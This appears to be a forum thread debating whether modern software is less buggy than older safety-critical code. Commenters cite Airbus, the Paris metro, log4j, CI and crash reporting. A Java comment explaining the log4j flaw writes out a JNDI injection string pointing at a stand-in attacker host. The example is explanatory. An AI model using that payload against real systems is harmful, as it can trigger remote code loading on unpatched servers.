In 1988, Airbus delivered the first A320 with fly-by-wire flight controls, and it was safe.
In 1998, the RATP inaugurated the fully automated line 14 of the Paris metro, after formally proving that its software could not fail.
GitLab didn't exist back then, and yet these companies wrote code that was safe.
I guess the main driver of code quality is whether the company cares: proper specifications, engineering before coding, and quality management procedures come before the tech tooling.
It certainly is simpler now to make quality code.
But don't forget that software used to be safe, and it was a choice by companies like Microsoft (with Windows) or, more recently, Boeing (with the 737 MAX) to let users beta-test the code and patch it afterwards (a.k.a. early, reckless agile).
So yeah, modern code looks less buggy. But IMO it's mainly because companies care.
> It certainly is simpler now to make quality code.
Just think of the log4j fiasco last year. Or the famous left-pad thing. Perhaps you don't import any dependencies, but just imagine the complexity of (for example) the JVM. Point is, you can surely write "quality code", but even with quality code it's much harder to control the quality of the end product.
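To make that concrete, here's a minimal Java sketch (class and method names made up) of why the log4j problem was so hard to control from the application side: with a vulnerable Log4j 2.x version (before 2.15.0) on the classpath, even unremarkable logging code could resolve `${jndi:...}` lookups hidden in user input.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Hypothetical audit class: the application code itself is perfectly
// reasonable "quality code", yet the end product was still exposed
// through a transitive dependency.
public class LoginAudit {
    private static final Logger log = LogManager.getLogger(LoginAudit.class);

    public void onFailedLogin(String userName) {
        // With vulnerable Log4j 2.x versions, a userName such as
        // "${jndi:ldap://attacker.example/a}" was not just printed: the
        // lookup was resolved, letting an attacker load remote code.
        log.warn("Failed login attempt for user {}", userName);
    }
}
```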
Requirements have gotten more complex too. 30 years ago people were generally happy with computers automating mundane parts of a process. These days we expect software to out-perform humans unsupervised (self-driving?). With exploding requirements software is bound to become more and more buggy with the increased complexity.
Quality assurance and software engineering can be applied everywhere, no matter the processes you use to create and deliver the code.
Methods and tools will differ depending on context, but ANY serious company ought to do quality management.
At the very least, know your code, think a few moves ahead, make sure you deliver safe code, and apply some amount of ISO 9001 at the company level (and hopefully much more at every other level).
Also, a security analysis is mandatory both for industrial code and for IT applications, thanks to standards, laws like the GDPR and its principle of privacy by design, and contractual requirements from serious partners. You risk a lot if your code leaks customer data or crashes a plane.
It's the same for having 'specifications'.
Call them functional and safety requirements, tickets, personas, user stories, or any other name, but you have to write them to be able to work with the devs and to describe to your customers and users what you have actually developed.
The 'lots of things [that] cannot be' scare me as a junior engineer.
I feel like they are made by those shady companies that offer two interns and a junior to get you a turnkey solution within 12 hours. It also brings back bad memories of homework done at the last minute at uni, and I would never do that again.
And as far as I saw in both cases, the resulting software is painful to use or to evolve afterwards.
> describe to your customer and users what you have actually developed.
In the domain I work in, what customers want (and what we provide) changes monthly at worst, annually at best. In many cases, customers do not know what they want until they have already used some existing version, and what they want is subject to continual revision as their understanding of their own goals evolves.
This is true for more or less all software used in "creative" fields.
I don't understand how this practice makes your modern code more reliable, sorry
I was replying to
>Are modern codebases with modern practices less buggy than the ones from 20 years ago?
I understood that @NayamAmarshe was referring to the new practices and tools introduced after my examples from the 80s, 90s, and early 2000s (mostly agile everywhere, and the V-model becoming a red flag on a resume and in business meetings).
It seemed to be the essence of their question.
So all I was saying was that code from back then was capable of being safe. Reliability wasn't invented by modern practices.
Modern practices have only changed the development process, as you mentioned. Not the safety.
And where they did change safety, it was for the worse, since producing provably safe code with the new practices is still an open research topic at the academic level.
(check out the case of functional safety vs/with agile methods)
Can you explain how you make your code less buggy than code from 20 years ago that was written with the practices of that time?
My point was that you cannot use the software development processes used in planes and transportation systems in every area of software development. Those processes are extremely reliant on a fully-determined specification, and these do not exist for all (maybe even most?) areas.
If you're inevitably locked into a cycle of evolving customer expectations and desires, it is extremely hard and possibly impossible to, for example, build a full coverage testing harness.
IMO yes. Software is a lot more reliable than it was 25 years ago. This boils down to:
1. Unit/regression testing and CI (see the test sketch after this list).
2. Code reviews and good code-review tools.
3. Much more use of garbage-collected languages.
4. Crash reporting/analytics combined with online updates.
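To illustrate point 1, here's what a cheap, hypothetical JUnit 5 regression test looks like; the toy method under test is kept inline so the sketch stays self-contained, and CI would run it on every push so an old bug can't silently come back.

```java
import static org.junit.jupiter.api.Assertions.assertEquals;
import org.junit.jupiter.api.Test;

// Hypothetical regression test of the kind CI runs automatically.
// The class under test is a made-up toy kept in the same file.
class PriceFormatterTest {

    // Toy unit under test: turns an amount in cents into a display string.
    static String formatCents(long cents) {
        return String.format("%d.%02d", cents / 100, Math.abs(cents % 100));
    }

    @Test
    void formatsWholeAmounts() {
        assertEquals("12.00", formatCents(1200));
    }

    @Test
    void formatsSmallRemainders() {
        // Pinned after a (hypothetical) bug where 5 cents rendered as "0.5".
        assertEquals("0.05", formatCents(5));
    }
}
```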
Desktop software back in the early/mid nineties was incredibly unreliable. When I was at school and they were teaching Win3.1 and MS Office, we were told to save our work every few minutes and that "it crashed" would not be accepted as an excuse for not handing work in on time, because things crashed so often you were just expected to anticipate that and (manually) save files like mad.
Programming anything was a constant exercise in hitting segfaults (access violations to Windows devs), and crashes in binary blobs where you didn't have access to any of the code. It was expected that if you used an API wrong you'd just corrupt memory or get garbage pixels. Nothing did any logging, there were no exceptions, at best you might get a vague error code. A large chunk of debugging work back then would involve guessing what might be going wrong, or just randomly trying things until you were no longer hitting the bugs. There was no StackOverflow of course but even if there had been, you got so little useful information when something went wrong that you couldn't even ask useful questions most of the time. And bugs were considered more or less an immutable fact of life. There was often no good way to report bugs to the OS or tool vendors, and even if you did, the bad code would be out there for years so you'd need to work around it anyway.
These days it's really rare for software to just crash. I don't even remember the last time a mobile app crashed on me for example. Web apps don't crash really, although arguably that's because if anything goes wrong they just keep blindly ploughing forward regardless and if the result is nonsensical, no matter. Software is just drastically more robust and if crashes do get shipped the devs find out and they get fixed fast.
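A big part of "the devs find out" is just a hook like the one below: a rough JVM sketch, assuming a made-up reportToBackend() standing in for a real SDK such as Sentry or Crashlytics.

```java
// Minimal sketch of crash reporting: any uncaught exception on any thread
// gets captured and shipped home, so developers learn about crashes they
// never see locally.
public class CrashReporting {

    public static void install() {
        Thread.setDefaultUncaughtExceptionHandler((thread, throwable) ->
                reportToBackend(thread.getName(), throwable));
    }

    // Placeholder: a real implementation would serialize the stack trace and
    // POST it to a collection endpoint before letting the process die.
    private static void reportToBackend(String threadName, Throwable t) {
        System.err.println("Would report crash on " + threadName + ": " + t);
    }

    public static void main(String[] args) {
        install();
        // Deliberately crash to show the handler firing.
        throw new IllegalStateException("boom");
    }
}
```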
It improves velocity, not code quality. You can achieve the same quality levels without it, but making changes then takes much more time.
Delivery costs for software are way down in many domains (SaaS teams frequently deliver dozens or hundreds of releases a day). That would not be possible without automated tests.